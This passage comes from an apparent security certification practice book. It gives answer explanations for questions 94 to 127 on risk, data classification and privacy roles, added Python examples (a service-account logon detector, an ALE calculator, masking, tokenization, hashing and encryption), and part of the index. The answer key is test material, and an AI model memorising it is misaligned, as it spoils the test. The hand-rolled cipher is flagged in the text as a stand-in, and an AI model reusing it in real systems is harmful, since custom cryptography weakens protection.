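Questions 68 and 93 both rest on the same detection rule: any interactive logon by a service account, successful or not, is an indicator of compromise. The following Python is an added example (not code from the book) showing that rule as detection logic run over Windows Security log events exported as JSON lines. The events, the `svc_` naming convention and the `KNOWN_SERVICE_ACCOUNTS` inventory are constructed for the example; the logon type numbers are the standard Windows values.

```python
import json
from typing import Dict, Iterable, List

# Windows logon types that establish an interactive session: console (2),
# RDP/terminal services (10) and console with cached credentials (11).
# Network (3), batch (4) and service (5) logons are the normal way a
# service account authenticates, so they are not flagged.
INTERACTIVE_LOGON_TYPES = {2: "Interactive", 10: "RemoteInteractive", 11: "CachedInteractive"}

# Assumed conventions for this example: service accounts carry an "svc_"
# prefix, plus an explicit inventory for the ones that do not.
SERVICE_ACCOUNT_PREFIX = "svc_"
KNOWN_SERVICE_ACCOUNTS = {"backupagent"}

# Constructed sample of Windows Security events (4624 = logon succeeded,
# 4625 = logon failed) exported as JSON lines; not real log data.
SAMPLE_EVENTS = """\
{"EventID": 4624, "TargetUserName": "alice", "LogonType": 2, "WorkstationName": "WS01", "IpAddress": "10.0.0.5", "TimeCreated": "2021-03-01T08:01:12Z"}
{"EventID": 4624, "TargetUserName": "svc_sql", "LogonType": 5, "WorkstationName": "DB01", "IpAddress": "-", "TimeCreated": "2021-03-01T08:02:00Z"}
{"EventID": 4624, "TargetUserName": "SVC_SQL", "LogonType": 10, "WorkstationName": "DB01", "IpAddress": "10.0.0.77", "TimeCreated": "2021-03-01T23:14:09Z"}
{"EventID": 4625, "TargetUserName": "backupagent", "LogonType": 2, "WorkstationName": "FS02", "IpAddress": "10.0.0.9", "TimeCreated": "2021-03-01T23:15:30Z"}
{"EventID": 4624, "TargetUserName": "svc_web", "LogonType": 3, "WorkstationName": "WEB01", "IpAddress": "10.0.0.20", "TimeCreated": "2021-03-01T23:16:00Z"}
"""


def is_service_account(username: str) -> bool:
    """Case-insensitive match against the naming convention and the inventory."""
    name = username.lower()
    return name.startswith(SERVICE_ACCOUNT_PREFIX) or name in KNOWN_SERVICE_ACCOUNTS


def detect_interactive_service_logons(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return one alert per interactive logon (success or failure) by a service account.

    Failed attempts are included deliberately: the policy treats an attempt
    to log in interactively as a service account as an IoC in its own right.
    """
    alerts = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        event = json.loads(raw)
        if event.get("EventID") not in (4624, 4625):
            continue
        logon_type = event.get("LogonType")
        user = event.get("TargetUserName", "")
        if logon_type in INTERACTIVE_LOGON_TYPES and is_service_account(user):
            alerts.append({
                "account": user,
                "logon_type": INTERACTIVE_LOGON_TYPES[logon_type],
                "outcome": "success" if event["EventID"] == 4624 else "failure",
                "host": event.get("WorkstationName", ""),
                "source_ip": event.get("IpAddress", ""),
                "time": event.get("TimeCreated", ""),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_interactive_service_logons(SAMPLE_EVENTS.splitlines()):
        print("IoC: interactive logon by service account:", alert)
```

Run against the sample, the rule fires twice: the RDP logon as `SVC_SQL` late at night and the failed console attempt as `backupagent`. The service-type logon by `svc_sql` and the network logon by `svc_web` are the account's normal behaviour and are left alone, which is what keeps this rule low-noise in a SIEM.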
94. C. The cost of a breach is an example of the impact of a breach. Probability is how likely the risk is to occur, and risk severity is calculated by multiplying probability and impact.
95. B. Sean is conducting a site risk assessment that will help him understand and communicate the risks that the site itself has. If the location is in a FEMA-identified floodplain, or if there are concerns about tornadoes or other natural disasters, those need to be taken into account as the organization makes its decisions about the location. A BIA identifies mission-critical functions and the systems that support them. Crime prevention through environmental design is a design concept that uses the design of facilities to reduce the likelihood of criminal actions through use of lighting and other controls. Business continuity planning focuses on how to keep an organization operating despite disruptions.
96. D. A SOC 2 engagement assesses the security and privacy controls that are in place, and a Type 2 report provides information on the auditor's assessment of the effectiveness of the controls that are in place. An SOC 1 report assesses the controls that impact the accuracy of financial reporting. Type 1 reports provide the auditor's opinion of the description provided by management about the suitability of the controls as designed. They do not look at the actual operating effectiveness of the controls.
97. B. Ensuring that leadership throughout an organization is aware of the risks the organization faces and that they are regularly updating and providing feedback on those risks helps increase risk awareness. Inherent risk is risk that exists before controls are in place, and residual risk is risk that remains after controls are in place. Risk appetite is the risk that an organization is willing to take as part of doing business.
98. C. State laws often include breach notification thresholds and requirements that organizations must follow. Laura should ensure that she is both aware of the breach laws for her state and any other states or countries her company operates in, and that her incident response plans have appropriate processes in place if a breach occurs. Organizations that process data like SSNs are unlikely to delete them even if a breach occurs, reclassifying data would not help unless the data was improperly classified before the breach, and data minimization plans are used to limit how much data an organization has, not to respond to a breach directly.
99. C. Nondisclosure agreements (NDAs) are signed by an employee at the time of hiring, and they impose a contractual obligation on employees to maintain the confidentiality of information. Disclosure of information can lead to legal ramifications and penalties. NDAs cannot ensure a decrease in security breaches. A job rotation policy is the practice of moving employees between different tasks to promote experience and variety. Separation of duties requires more than one person to complete a task. A mandatory vacation policy is used by companies to detect fraud by having a second person, familiar with the duties, help discover any illicit activities.
100. B. Olivia should establish a service level agreement (SLA) with her provider to ensure that they meet the expected level of service. If they don't, financial or other penalties are typically included. Olivia should ensure that those penalties are meaningful to her vendor to make sure they are motivated to meet the SLA. An MOU is a memorandum of understanding and explains the relationship between two organizations; an MSA is a master services agreement, which establishes a business relationship under which additional work orders or other documentation describe the actual work that is done; and a BPA is a business partnership agreement, which is used when companies wish to partner on efforts and may outline division of profits or responsibilities in the partnership.
101. D. The most accurate risk descriptor for this is software compliance. Although this is an internal risk, software compliance fully describes the issue. Intellectual property (IP) theft risk occurs when an organization's intellectual property is stolen, not when license violations for third parties occur. This is not a legacy system, or at least it was not described that way in the question.
102. D. Inherent risk is the risk that an organization faces before controls are put in place. Without risk assessment and controls in place, Gary must first deal with the inherent risks the organization has as it exists today. Residual risk is the risk that is left after controls are put in place. The theft of intellectual property (IP) like algorithms, formulas, and processes is an IP risk, and multiparty risk is risk that impacts more than one group, company, or person.
103. A. The single loss expectancy (SLE) describes what a single risk event is likely to cost. It is calculated using the asset value (AV) times the exposure factor (EF), which is an estimated percentage of the cost that will occur in damage if the loss occurs. MTTR is the mean time to restore, ARO is the annual rate of occurrence, and RTO is the recovery time objective. These are not part of the SLE equation.
104. C. Third-party credential policies address how contractors' and consultants' credentials are handled. This may require sponsorship by an internal staff member, additional controls regarding password resets or changes, and shorter lifespans, among other controls and requirements.
105. B. Annual rate of occurrence (ARO) is expressed as the number of times an event will occur in a year. Wayne has estimated that the risk event that is being assessed will happen three times a year.
106. D. Although humans can create fires or floods, industrial accidents are the only item on the list that is exclusively a person-made disaster.
107. C. Information on a website made available to customers is typically classified as public information because it is easily available and intentionally exposed to them. Confidential, sensitive, or critical information is unlikely to be exposed to customers without a specific data handling agreement and additional security layers.
108. D. Data processors are service providers that process data for data controllers. A data controller or data owner is the organization or individual who collects and controls data. A data steward carries out the intent of the data controller and is delegated responsibility for the data. Data custodians are those who are entrusted with the data to store, manage, or secure the data.
109. D. Data masking partially redacts sensitive data by replacing some or all information in a sensitive data field with blanks or other replacement characters. Tokenization replaces sensitive data with unique identifiers using a lookup table. Hashing performs a one-way function on a value to get a unique hash, and encryption protects data using an algorithm that can be reversed to restore the original data while allowing for confidentiality and integrity validation.
110. C. The Cloud Security Alliance's reference architecture includes information about tools in a vendor-neutral manner. CIS provides vendor-specific benchmarks for AWS, Azure, and Oracle's cloud offerings. The International Organization for Standardization (ISO) and the National Institute of Standards and Technology (NIST) do not offer this type of resource.
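Questions 76, 89, 94, 103 and 105 together describe the arithmetic behind a risk register: SLE = AV × EF, ARO as the number of events per year, and qualitative severity as probability × impact placed on a heat map. The Python below is an added example, not code from the book, that carries that through for a small constructed register. It goes one step beyond the page by combining SLE and ARO into the annualized loss expectancy (ALE = SLE × ARO), the standard next step in a quantitative assessment; the heat map thresholds and the register entries are assumed values chosen for illustration.

```python
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class Risk:
    """One entry in a constructed risk register (example values only)."""
    name: str
    asset_value: float      # AV: value of the asset in dollars
    exposure_factor: float  # EF: fraction of AV lost in one event, 0.0 to 1.0
    aro: float              # ARO: expected number of events per year


def single_loss_expectancy(asset_value: float, exposure_factor: float) -> float:
    """SLE = AV x EF, the cost of a single occurrence of the risk."""
    if not 0.0 <= exposure_factor <= 1.0:
        raise ValueError("exposure factor must be a fraction between 0 and 1")
    return asset_value * exposure_factor


def annualized_loss_expectancy(sle: float, aro: float) -> float:
    """ALE = SLE x ARO, the expected yearly cost.

    ALE is not defined on the page itself; this is the standard formula that
    combines the SLE of question 103 with the ARO of question 105.
    """
    if aro < 0:
        raise ValueError("ARO cannot be negative")
    return sle * aro


def qualitative_severity(probability: int, impact: int) -> int:
    """Severity = probability x impact, both rated on a 1-5 scale."""
    for score in (probability, impact):
        if not 1 <= score <= 5:
            raise ValueError("probability and impact are rated 1 to 5")
    return probability * impact


def heat_map_band(severity: int) -> str:
    """Band for a 5x5 risk matrix; the thresholds are an assumed example choice."""
    if severity >= 15:
        return "high"
    if severity >= 6:
        return "medium"
    return "low"


def rank_register(register: List[Risk]) -> List[Tuple[str, float, float]]:
    """Return (name, SLE, ALE) for every risk, highest ALE first."""
    rows = []
    for risk in register:
        sle = single_loss_expectancy(risk.asset_value, risk.exposure_factor)
        rows.append((risk.name, sle, annualized_loss_expectancy(sle, risk.aro)))
    return sorted(rows, key=lambda row: row[2], reverse=True)


# Constructed register; the 3-per-year entry mirrors Wayne's estimate in question 105.
SAMPLE_REGISTER = [
    Risk("ransomware on file server", asset_value=200_000, exposure_factor=0.5, aro=0.5),
    Risk("laptop theft", asset_value=3_000, exposure_factor=1.0, aro=3),
    Risk("web defacement", asset_value=50_000, exposure_factor=0.1, aro=2),
]

if __name__ == "__main__":
    for name, sle, ale in rank_register(SAMPLE_REGISTER):
        print(f"{name:28s} SLE=${sle:>10,.0f}  ALE=${ale:>10,.0f}")
    print("qualitative 4 x 4 ->", heat_map_band(qualitative_severity(4, 4)))
```

The ranking is the point of the exercise: a rare, expensive event (ransomware) outranks a frequent, cheap one (laptop theft) once both are expressed as an annual figure, which is the comparison a heat map makes visually and ALE makes numerically.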
111. C. Locks are physical controls. An example of a managerial control would be a policy or practice, a technical control can include things like firewalls or antivirus, and corrective controls are put in place to ensure that a problem or gap in another control is fixed.
112. C. Control risk is a term used in public accounting. It is the risk that arises from a potential lack of internal controls within an organization that may cause a material misstatement in the organization's financial reports. In this case, the lack of controls that would validate the financial system's data and function is a control risk.
113. C. Although fires, oil spills, and wars are all potential examples of person-made disasters, hurricanes remain solely a natural disaster. Some disasters could be either a person-made or natural disaster. For example, fires can be caused by humans or by nature, as can floods, and even chemical spills when an earthquake occurs.
114. C. Confidential information is classified by the U.S. government as information that requires some protection and that, if disclosed without authorization, would cause identifiable harm to national security. Top Secret information requires the highest degree of protection and would cause exceptionally grave harm if exposed without authorization. Secret information requires a substantial degree of protection and would cause serious damage if exposed. Business Sensitive is not a U.S. government classification but is a term commonly used in businesses.
115. C. Phone numbers uniquely identify individuals, making them an example of personally identifiable information, or PII. PHI is protected health information, financial information includes financial records of all types, and government information is information that belongs to the government or may be classified by the government and entrusted to an organization.
116. B. Tokenization is an ideal option for this scenario. Tokenization replaces a sensitive value with an alternate value that can be looked up in a table when the value needs to be referenced back to its original form. Encryption does not meet this need, data masking only hides part of the value, and data washing is not a commonly used term for techniques of this nature.
117. C. Privacy notices are often included on websites to meet the requirements of laws or regulations like the General Data Protection Regulation (GDPR) or state privacy laws.
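Questions 109 and 116 contrast four ways of protecting a sensitive field: masking, tokenization, hashing and encryption. The Python below is an added example, not the book's code, that implements all four on a constructed card number so the differences (partial, reversible through a lookup table, one-way, reversible with a key plus an integrity check) can be seen side by side. Assumptions made here: the mask keeps the last four characters, tokens are random `tok_` identifiers, the hash is keyed with HMAC so low-entropy values cannot be recovered by guessing, and the encryption uses an HMAC-SHA256 keystream in counter mode with an encrypt-then-MAC tag because the Python standard library ships no AES; a real deployment would use an AEAD cipher from a cryptography library instead.

```python
import hashlib
import hmac
import secrets
from typing import Dict


def mask(value: str, keep_last: int = 4, mask_char: str = "X") -> str:
    """Data masking: replace every character except the last `keep_last`."""
    if keep_last < 0:
        raise ValueError("keep_last must be non-negative")
    hidden = max(len(value) - keep_last, 0)
    return mask_char * hidden + value[hidden:]


class TokenVault:
    """Tokenization: a random token stands in for the value; the lookup table
    (in production, a separately secured vault database) maps it back on demand."""

    def __init__(self) -> None:
        self._token_to_value: Dict[str, str] = {}
        self._value_to_token: Dict[str, str] = {}

    def tokenize(self, value: str) -> str:
        if value not in self._value_to_token:
            token = "tok_" + secrets.token_hex(8)  # random, reveals nothing about the value
            self._token_to_value[token] = value
            self._value_to_token[value] = token
        return self._value_to_token[value]

    def detokenize(self, token: str) -> str:
        return self._token_to_value[token]      # KeyError for unknown tokens


def keyed_hash(value: str, key: bytes) -> str:
    """Hashing: one-way. HMAC with a secret key is used instead of bare SHA-256 so
    values with little entropy (phone numbers, card numbers) cannot be brute-forced."""
    return hmac.new(key, value.encode(), hashlib.sha256).hexdigest()


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Counter-mode keystream from HMAC-SHA256 (a PRF); stdlib-only stand-in for AES-CTR."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def encrypt(value: str, key: bytes) -> bytes:
    """Encryption: reversible with the key, plus an integrity tag (encrypt-then-MAC).
    Output layout: 16-byte nonce || ciphertext || 32-byte tag."""
    enc_key = hmac.new(key, b"enc", hashlib.sha256).digest()
    mac_key = hmac.new(key, b"mac", hashlib.sha256).digest()
    nonce = secrets.token_bytes(16)
    data = value.encode()
    ciphertext = bytes(a ^ b for a, b in zip(data, _keystream(enc_key, nonce, len(data))))
    tag = hmac.new(mac_key, nonce + ciphertext, hashlib.sha256).digest()
    return nonce + ciphertext + tag


def decrypt(blob: bytes, key: bytes) -> str:
    """Verify the tag first; only an unmodified blob is decrypted."""
    if len(blob) < 16 + 32:
        raise ValueError("blob too short to contain nonce and tag")
    enc_key = hmac.new(key, b"enc", hashlib.sha256).digest()
    mac_key = hmac.new(key, b"mac", hashlib.sha256).digest()
    nonce, ciphertext, tag = blob[:16], blob[16:-32], blob[-32:]
    expected = hmac.new(mac_key, nonce + ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("integrity check failed: ciphertext or tag was altered")
    data = bytes(a ^ b for a, b in zip(ciphertext, _keystream(enc_key, nonce, len(ciphertext))))
    return data.decode()


if __name__ == "__main__":
    card = "4111111111111111"  # constructed test card number, not a real account
    key = secrets.token_bytes(32)
    vault = TokenVault()
    print("masked:   ", mask(card))
    print("token:    ", vault.tokenize(card))
    print("hash:     ", keyed_hash(card, key))
    print("decrypted:", decrypt(encrypt(card, key), key))
```

The four outputs answer the question each technique is designed for: masking shows a support agent the last four digits and nothing more; the token can be stored and passed around freely and only the vault can turn it back; the hash lets two records be compared for equality without either side holding the value; and encryption is the only one of the four that restores the original anywhere the key is present, which is exactly why question 116 prefers tokenization when the value must be looked up rather than decrypted in place.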
118. C. Nicole is a data controller, sometimes called a data owner. She determines the reasons for processing personal information and how it is processed. A data steward carries out the intents of the data controller, data custodians are charged with safeguarding information, and data consumer is not a common data privacy role.
119. B. This is an internal disaster, one in which internal issues have led to a problem. An external disaster would be caused by forces outside the organization like a natural disaster, malicious activity, or other outside forces. An RTO, or recovery time objective, is not a type of disaster, and an MRO disaster was made up for this question.
120. C. Minimizing the amount of data that is collected is the first step in ensuring that organizations can handle the volume and types of data that they work with. After that, classifying it and then determining how long you retain it are also important parts of the data lifecycle.
121. D. Kirk has mitigated the risk to his organization by increasing the resources targeted by the DoS attack in an attempt to ensure that the attack will not be successful. Acceptance would involve simply letting the attacks occur knowing they are likely to stop, avoidance might involve finding a way to ensure the attacks cannot occur, and transfer could leverage a third-party mirror or anti-DoS hosting service.
122. A. A multiparty risk involves multiple organizations. Since there are multiple customers and organizations involved, this is an example of multiparty risk. An internal risk originates inside an organization; instead, this is an external risk. A legacy system risk is created by a system or process that is no longer supported or updated. An intellectual property (IP) theft risk occurs when proprietary information or trade secrets might be exposed or lost.
123. B. EOL, or end of life, occurs when a service or system is no longer supported, available, or does not function. Natasha needs to plan to transition smoothly away from the service, either to a replacement service or to stop using the service itself. An MOU is a memorandum of understanding, and an NDA is a nondisclosure agreement, neither of which is directly relevant here. A last will and testament is not used for a service EOL.
124. C. The Center for Internet Security (CIS) provides a wide range of OS, application, server, and other benchmarks. Microsoft provides benchmarks for their own operating systems but does not provide Linux benchmarks. The National Institute of Standards and Technology (NIST) does not provide benchmarks, but the National Security Agency (NSA) does.
125. C. Offboarding processes are conducted to ensure that accounts and access are removed and that materials, computers, and data are all recovered from the staff member when a member of an organization leaves. Exit interviews are an HR process, job rotation helps to prevent an individual from conducting fraudulent activities over time, and governance helps to manage and maintain data by establishing high-level control over the processes, procedures, and classification of the data an organization uses.
126. D. Public, private, sensitive, confidential, critical, and proprietary are all commonly used data classification labels for business. Secret, however, is more commonly used in government classification schemes.
127. D. Privacy notices are frequently provided as part of license or contractual terms, as well as in website usage agreements.
Index
A
academic journals, 211
acceptable use policy (AUP), 161, 172, 283, 290
access control lists (ACLs), 130, 266–267
access policies, 265–266
accounts
    disabling, 254
    Guest, 103–104, 113, 251, 258
    service, 251, 293
    user, 258
active nodes, 238–239
active reconnaissance, 29, 203
active scans, 16, 195
ad hoc wireless networks, 98–99, 248
Address Resolution Protocol (ARP)
    blocking, 257
    poisoning, 2, 7, 24, 25, 186, 190, 200
    spoofing, 200
administrative controls, 287
Advanced Encryption Standard (AES), 52, 217
advanced persistent threats (APTs), 13, 18, 20, 21, 191, 193, 196, 197, 273
adware, 17, 193, 195, 198
air gapping, 78, 213, 235
AIS service, 208
alarms, 68, 227–228
allow lists, 130, 266–267
annual loss expectancy (ALE), 167, 169, 287, 289
annual rate of occurrence (ARO), 169, 287, 289, 295
anomaly-based detection systems, 263
anonymization, 171–172, 290
antivirus (AV) programs, 10, 165, 191, 284, 285
Apache log, 38, 209
application blocklist, 274
application counter, 221
application programming interface (API), 5, 51, 79, 188, 216, 236, 258
Arduino, 48, 214
artifacts, 270, 272
artificial intelligence (AI), 210
asset management policies, 291
asset value (AV), 295
asymmetric cryptography, 71, 230
asymmetric warfare, 196
@ command, 275
attestation processes, 233
attribute-based access control (ABAC), 114, 255, 259
audio steganography, 77, 234
audit/auditing, 196, 198, 262
authentication, authorization, and accounting (AAA), 231
Authentication Header (AH), 85, 239, 248
authority, 24, 200
automation, 225
Autopsy, 274, 275
awareness training, 5, 188
B
backdoor, 8, 19, 21, 22, 24, 190, 196, 198, 200
back-off algorithms, 246
backups, 130–131, 267
badges, 66, 226
BadUSB, 199
baseline configurations, 53, 217
baselining, 56, 219, 245
Bash shell, 26, 150, 201, 278
bastion host, 249
Bcrypt algorithm, 80, 236
biometric scans, 48, 214–215
birthday attack, 11, 12, 21, 28, 192, 198, 203
bit, 214
BitLocker keys, 230
black hole, 52, 216
black-box test, 190, 200, 201, 203, 204
blacklisting, 91, 243, 244
block cipher, 214
blockchain, 51, 216
blue teams, 4–5, 22, 30, 188, 199, 204
bluejacking, 3, 5, 10, 11, 27, 32, 186, 188, 191, 192, 202, 205
bluesnarfing, 5, 10, 32, 188, 191, 205
bollards, 55, 66, 219, 226
bookmarks, 271
boot attestation, 254
boot sector virus, 16, 17, 195
botnets, 7, 17, 189, 195
Bridge Protocol Data Unit (BPDU), 262
bring your own device (BYOD), 105, 252
brute-force attacks, 12, 13, 19, 21, 71, 192, 193, 197, 198, 203, 230
buffer overflow, 5, 16, 18, 21, 22, 26, 188, 194, 195, 196, 198, 199, 201, 243
bug bounties, 35, 207
burning media, 79, 236
business continuity plan (BCP), 275
business impact analysis (BIA), 165, 177, 285, 293
business partnership agreement (BPA), 162, 165, 179, 283–284, 286, 294
C
cable locks, 55, 219
Cacti, 274
captive portal, 83, 238
card cloning, 29, 198, 203
cat command, 269
Center for Internet Security (CIS), 167, 174, 180–181, 183, 287, 291, 297
CentOS, 270
certificate authority (CA), 264
certificate chains, 262
certificate expiration tracking, 204
certificate pinning, 266
certificate revocation lists (CRLs), 241
certificate stapling, 85, 239
-c flag, 268
chain of custody, 132–133, 268, 273
Challenge Handshake Authentication Protocol (CHAP), 106, 120, 251, 252, 263
change management, 161, 282–283
CIA triad, 202
clean desk policy, 161, 162, 164, 169, 283, 285, 289
clickjacking, 3, 44, 186, 212
client-side tampering, 48, 214
closed threat intelligence, 205
closed-circuit television (CCTV), 71, 165, 230, 286
cloud access security broker (CASB), 59–60, 125, 222, 239, 265
cloud applications, 264
cloud backups, 223
Cloud Control Matrix maps, 292
cloud firewall, 103, 251
Cloud Security Alliance, 292, 295
cloud service
    providers in, 234
    vulnerabilities in, 204
code
    digitally signed, 248
    formatting, 195
    reviewing, 247
    signing, 244
code reuse attack, 61, 223
cold aisle, 59, 221
cold site, 50, 68, 215, 228
collisions, 12, 71, 193, 230
collusion, 169, 288–289
common name (CN), 90, 242
Common Vulnerabilities and Exposures (CVE), 11, 192, 211
community cloud, 64, 65, 225
compensating control, 164, 285, 287
conditional access, 118, 261
configuration
    managing, 259
    reviews of, 212
    weak, 196
consensus, 16, 194
containerization, 252
containment, 132, 150, 268, 278, 280
content filter, 272
Content-Addressable Memory (CAM), 272
context-aware authentication, 249
Continuity of Operations Planning (COOP), 133, 147, 150, 268, 276, 278
continuous integration/continuous delivery (CI/CD), 64, 225
control diversity, 235
control risks, 290, 296
cookies, 88, 241
corrective control, 284
correlation dashboards, 130, 267
counter mode (CTR), 50–51, 215
coverage overlap, 254
credential harvesting, 5, 188
credentialed scan, 17, 195
criminal syndicates, 9, 191
cross-over error rate (CER), 65, 70, 226, 229
cross-site request forgery (XSRF), 11, 16, 21, 26, 36, 44, 192, 194, 198, 201, 208, 212
cross-site scripting (XSS), 2, 3, 5, 6, 7, 11, 16, 20, 21, 26, 36, 186, 188, 190, 192, 194, 197, 198, 201, 208
cryptographic hashes, 186, 227
Cuckoo, 146, 276
Cuckoo Sandbox, 136, 270
curl command, 155, 281
customer data, 293
CVSS standard, 132, 267
Cyber Kill Chain, 132, 145, 267, 276
cyber intelligence fusion, 11, 192
D
dark web, 30, 203
data
    governance policy for, 172, 290
    masking of, 166, 286, 295
    minimization of, 166, 182, 286, 296
    retention policy for, 167, 169, 287, 289
    storing, 223
data breaches
    common results of, 290
    cost of, 293
    notifications for, 277
    recovering from, 292
data controller, 296
Data Encryption Standard (DES), 52, 217
data loss prevention (DLP), 72, 124, 139, 142–143, 231, 253, 265, 272, 274, 277
data owner, 296
data processors, 180, 295
data protection officer (DPO), 176, 292
data retrieval, 241
data sovereignty, 229
database administrator (DBA), 226
deadbolts, 229
deepfakes, 219
degaussing, 79, 236, 258, 273
demilitarized zone (DMZ), 72, 78, 89, 90, 107, 108, 111, 112, 230, 231, 235, 242, 243, 253, 255, 257
denial-of-service (DoS) attack, 22, 34, 38, 198, 206–207, 209–210
deployment policies, 53, 217
deprovisioning, 56, 219
detective control, 163, 164, 167, 284, 285, 286, 287
deterrent control, 164, 167, 284, 285, 287
development server, 51, 216
Diamond Model, 132, 267
dictionary attacks, 9, 12, 28, 191, 192, 203
differential backups, 65, 225
digital certificates, 246, 260
digital forensics, 57, 220, 268, 270, 272, 273, 277, 281–282
digital signatures, 48, 76, 214, 233
directory traversal attacks, 30–31, 204
disassociation attack, 12, 13, 192, 193
disaster recovery (DR) plan, 147, 154, 172, 175, 180, 276, 281, 290, 292, 296
discretionary access control (DAC), 111, 114, 257, 259
disk backup, 62, 223
Distinguished Encoding Rules (DER) format, 126, 266
distributed denial-of-service (DDoS) attack, 13, 22, 187, 190, 193, 195, 198, 222
DLL injection, 18, 196
DNS logs, 133, 268–269
dnsenum tool, 147, 276, 277
domain experts, 207
domain hijacking, 6, 189
Domain Name System (DNS)
    DNS hijacking, 6, 189
    DNS server, 212
    DNS sinkhole, 58, 221
    poisoning attacks, 7, 21, 24, 190, 198, 200
Domain Name System Security Extension (DNSSEC), 99, 238, 248
domain reputation services, 8, 190
domain theft, 189
downgrade attacks, 12, 31, 193, 204
drones, 57, 206, 220, 233
dual control, 237
due care, 161, 282–283
due diligence, 161, 282–283
dump file, 279
dumpster diving, 28, 191, 202
dynamic code review, 247
Dynamic Host Configuration Protocol (DHCP), 87, 101, 240, 250, 279
E
EAP Tunneled Transport Layer Security (EAP-TTLS), 94, 245, 251
EAP-FAST, 94, 245
east-west traffic, 82, 237
edge computing, 74, 232, 236
802.1x, 80, 119, 236, 262
elasticity, in cloud computing, 56, 226
electromagnetic interference (EMI), 218
electronic discovery (e-discovery), 282
electronic locks, 229
elicitation, 16, 195
elliptical curve cryptography (ECC), 74, 214, 215, 232
email headers, 278
embedded systems, 216, 224
encryption, 76, 78, 101, 234, 235, 249
encryption keys, 231
end of life (EOL), 183, 297
endpoint detection and response (EDR), 102, 250
entropy, 54, 218
error handling, 14, 44, 194, 212
escalation, 284
evil twin attack, 10, 11, 20, 24, 32, 191, 192, 197, 200, 205
exit interviews, 193, 297
exposure factor (EF), 295
extended validation (EV), 252
Extensible Authentication Protocol (EAP), 251
F
facial recognition systems, 71, 223, 230
fake telemetry, 56, 219
false acceptance rate (FAR), 70, 226, 229
false negative, 15, 36, 194, 208
false positive, 15, 36, 194, 208
false rejection rate (FRR), 70, 229
familiarity, 16, 194
Faraday cage, 55, 69, 218, 229, 233
Federal Bureau of Investigations (FBI), 150, 278
Federal Emergency Management Agency (FEMA), 150, 278
Federal Trade Commission (FTC), 174, 291
Feedburner, 34, 206
fencing, 232
FIDO U2F, 84, 238
field-programmable gate array (FPGA), 48, 214
file permissions, 266
File Transfer Protocol (FTP), 16, 195
File Transfer Protocol Secure (FTPS), 239
fileless virus, 199
file systems, 256
fingerprint reader systems, 62, 223
firewalls, 77, 88, 216, 234, 241, 286
firmware, 223, 269
5G, 79, 236
fog aggregator, 101, 249
fog computing, 80, 236
footprinting, 35, 207
formatting code, 195
forward proxy, 112, 114, 257
FTK Imager, 270, 274
full-disk encryption (FDE), 52, 63, 90, 112, 117, 216–217, 219, 224, 226, 242, 252, 253, 258, 261, 275
fully qualified domain name (FQDN), 242
function-as-a-service (FaaS), 221
fuzzing, 101, 245, 249–250, 252
G
gait analysis, 64, 225
gamification, 175, 292
General Data Protection Regulation (GDPR), 162, 170, 283, 289, 292
generator, 75, 233
generators, 165–166, 286
geofence, 95, 245
geolocation, 213
GitHub, 40, 210
Global Positioning System (GPS), 89, 241
government data, 290
gray market, 38, 209
gray-box test, 201
grep command, 144, 275
Guest accounts, 103–104, 113, 251, 258
H
hacktivism, 196
hacktivists, 18, 19, 39, 196, 210
hardening, 93, 242, 244, 259
hardware firewall, 103, 251
hardware security module (HSM), 52, 95, 217, 246, 256, 259
hash functions, 47, 213, 214
hashing, 101, 130, 249, 266, 269, 275, 295
hashing passwords, 71, 74, 223, 230, 232, 244
head command, 269
health information, 172, 290
heat maps, 243
HMAC-based one-time password (HOTP), 69, 228, 231, 238
hoax, 36, 208
homomorphic encryption, 62, 223
honeyfiles, 80, 236
honeynets, 52, 215, 216
honeypots, 49–50, 52, 215, 216, 219
host-based firewalls, 117, 261
host-based intrusion prevention system (HIPS), 117, 259, 261
hot aisle, 59, 221
hot site, 50, 68, 215, 228
hping tool, 152, 279
HTTP ports, 211
HVAC systems, 53, 218
hybrid computing, 74, 232
hybrid deployment model, 65, 225
hybrid models, 54, 218
hybrid warfare, 36, 208
hypervisor, 54, 218, 273
I
identity and access management (IAM), 231
identity attributes, 242
identity fraud, 39, 210
identity provider (IdP), 83, 238
identity theft, 210
identity-as-a-service (IDaaS), 58, 221
impact categories, 211
impersonation, 16, 195
incident response, 267, 273, 276, 278
indicators of compromise (IoC), 4, 187
industrial camouflage, 72, 230
inert gas systems, 233
Information Sharing and Analysis Centers (ISACs), 206
infrared (IR), 71, 230, 251
infrastructure as a service (IaaS), 54, 58, 64, 78, 209, 218, 221, 225, 235, 253
infrastructure as code (IaC), 60, 222
inherent risk, 179, 181, 295
initialization vectors (IVs), 2, 11, 186, 192, 232
input handling, 40, 210
input validation, 2, 186, 243, 249–250
insider threats, 18, 196, 261
integer overflow, 22, 26, 199, 201
integrity checking, 56, 219
intelligence fusion, 33, 205
interconnection security agreement (ISA), 162, 176, 283–284, 292
internal disaster, 296
internal risks, 289
internal services, 255
International Organization for Standardization (ISO), 295
Internet key exchange (IKE), 249
Internet Relay Chat (IRC), 202
intrusion detection system (IDS), 2, 13, 49–50, 52, 58, 117, 139, 174, 186, 193, 215, 216, 221, 227, 241, 250, 261, 272, 291
intrusion prevention system (IPS), 38, 52, 113, 165, 188, 209–210, 211, 216, 227, 241, 253, 258, 261, 279, 286, 291
intrusive scan, 17, 19, 195, 196
invoice scams, 25, 200
IP addresses, 70, 216, 229, 240, 250, 266
IP spoofing, 20, 23, 44, 197, 199, 212
IPFIX, 156, 282
IPSec, 88, 143, 239, 241, 263, 274
iptables, 273
iris scans, 62, 223
ISA/IEC standards, 46, 212
ISO 27002, 161, 282
ISO 27017, 161, 282
IT process, 277
J
jailbreaking, 104, 252
jamming attack, 2, 186
job rotation policy, 161, 164, 166, 169, 179, 283, 284–285, 286, 288–289, 294
John the Ripper, 149, 278
journalctl tool, 155, 156, 281, 282
jump boxes, 253
jurisdictional boundaries, 149, 278
K
Kerberos, 60, 102, 103, 106, 107, 109, 116, 222, 250, 251, 252, 254, 260
key distribution center (KDC), 116, 260
key escrow, 108, 254
key length, 231
key reuse, 72, 73, 230, 232
key stretching, 48, 214, 236
keylogger, 13, 193
keys, 214
